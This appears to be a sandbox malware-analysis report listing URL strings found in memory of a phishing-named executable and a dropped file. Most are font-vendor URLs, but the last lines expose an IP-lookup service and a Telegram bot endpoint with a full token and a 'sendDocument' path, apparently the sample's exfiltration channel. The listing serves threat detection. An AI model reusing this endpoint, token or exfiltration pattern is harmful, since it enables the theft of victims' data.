binary or memory: http://www.fontbureau.como
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comonyT
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comsivFf
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comtalik
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comto
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304315545.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304286522.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304257902.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304393632.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comtop/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comttod
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300897558.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300940819.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301420395.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301223897.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301313763.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301537024.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301444783.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301460866.0000000005F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307540852.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349450295.0000000005EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307573750.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307547855.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307630920.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307593958.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmY
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303423712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303953142.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303491476.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303547143.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303113304.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304121403.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303924617.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303459883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303190453.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303711642.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303288048.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304055892.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304005746.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303259684.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303777091.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303357363.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/9
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/FL
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/K
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/QO
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/T
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-eo
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0m
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/hu-h
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/oie.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301411124.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://VEVgTqSNHWikc.org
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://VEVgTqSNHWikc.orgD
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgMozilla/5.0
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/
Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/1644584536appdatamacDpmac
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org4

Source: unknown

